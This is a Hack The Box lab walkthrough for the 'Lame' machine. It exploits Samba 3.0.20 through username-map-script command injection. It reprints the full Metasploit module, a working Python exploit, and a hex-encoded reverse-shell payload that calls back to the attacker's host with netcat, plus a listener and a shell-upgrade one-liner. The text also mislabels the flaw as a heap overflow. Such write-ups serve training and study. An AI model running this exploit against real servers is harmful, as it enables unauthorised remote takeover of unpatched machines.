Hack The Box - Lame Walkthrough without Metasploit

Enumeration
First we start by running nmap against the target
nmap -sC -sV 10.10.10.3

Since FTP port is open and seems to allow Anonymous login we will try to log in and see if we can find anything

We found nothing there, next thing we can see in our initial enumeration is that Samba is running with version 3.0.20-Debian, with a fast google search we will find that it is vulnerable to a Remote Heap Overflow https://www.exploit-db.com/exploits/16320
##
# $Id: usermap_script.rb 10040 2010-08-18 17:24:46Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SMB
# For our customized version of session_setup_ntlmv1
CONST = Rex::Proto::SMB::Constants
CRYPT = Rex::Proto::SMB::Crypt
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba "username map script" Command Execution',
'Description' => %q{
This module exploits a command execution vulerability in Samba
versions 3.0.20 through 3.0.25rc3 when using the non-default
"username map script" configuration option. By specifying a username
containing shell meta characters, attackers can execute arbitrary
commands.
No authentication is needed to exploit this vulnerability since
this option is used to map usernames prior to authentication!
},
'Author' => [ 'jduck' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10040 $',
'References' =>
[
[ 'CVE', '2007-2447' ],
[ 'OSVDB', '34700' ],
[ 'BID', '23972' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
[ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => true, # root or nobody user
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
# *_perl and *_ruby work if they are installed
# mileage may vary from system to system..
}
},
'Targets' =>
[
[ "Automatic", { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 14 2007'))
register_options(
[
Opt::RPORT(139)
], self.class)
end
def exploit
connect
# lol?
username = "/=`nohup " + payload.encoded + "`"
begin
simple.client.negotiate(false)
simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
rescue ::Timeout::Error, XCEPT::LoginError
# nothing, it either worked or it didn't ;)
end
handler
end
end
But that is a Metasploit module and we want to do it without it... if we read the exploit it says that its exploiting a vulnerability by specifying a username containing shell meta characters, executing commands... and no authentication is needed to exploit this vulnerability, with this information we can make our python script to exploit this samba version.
Exploitation
Creating the script
This is the skeleton of the python script we will use to exploit this Samba version
#!/usr/bin/python3
#Samba 3.0.20-Debian
from smb import *
from smb.SMBConnection import *
#msfvenom -p cmd/unix/reverse_netcat LHOST=<Attacker-IP> LPORT=<Attacker-Port> -f python
payload =("");
userID = "/=` nohup " + payload + "`"
password = 'evil'
ip = '10.10.10.3'
conn = SMBConnection(userID, password,"some","thing", use_ntlm_v2=False)
conn.connect(ip, 445)
Creating the Payload
For the payload we will use msfvenom to create a reverse shell that we will capture with netcat:
msfvenom -p cmd/unix/reverse_netcat LHOST=<Attacker-IP> LPORT=<Attacker-Port> -f python
Putting everything together
#!/usr/bin/python3
#Samba 3.0.20-Debian
from smb import *
from smb.SMBConnection import *
#msfvenom -p cmd/unix/reverse_netcat LHOST=<Attacker-IP> LPORT=<Attacker-Port> -f python
payload =("\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6a"
"\x7a\x6a\x63\x6c\x6e\x67\x3b\x20\x6e\x63\x20\x31\x30"
"\x2e\x31\x30\x2e\x31\x34\x2e\x33\x20\x34\x34\x34\x34"
"\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x6a\x7a\x6a\x63\x6c"
"\x6e\x67\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20"
"\x3e\x2f\x74\x6d\x70\x2f\x6a\x7a\x6a\x63\x6c\x6e\x67"
"\x20\x32\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d"
"\x70\x2f\x6a\x7a\x6a\x63\x6c\x6e\x67");
userID = "/=` nohup " + payload + "`"
password = 'evil'
ip = '10.10.10.3'
conn = SMBConnection(userID, password,"some","thing", use_ntlm_v2=False)
conn.connect(ip, 445)
Now we start a listener on another shell
nc -nvlp 4444

We might run into an error while executing the script

In order to fix it we have to install the following python module if we are missing it:
pip3 install pysmb
Now we can run it again.. and if we have our listener ready we should be able to get a shell back
Pwnd
We got a shell back, the first thing we look for is to make it interactive, for that matter we will see if the machine has python with
which python
In this particular case that will be enought, we can use the following command to spawn an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'

Now we can grab our flag ;)
Last updated
Was this helpful?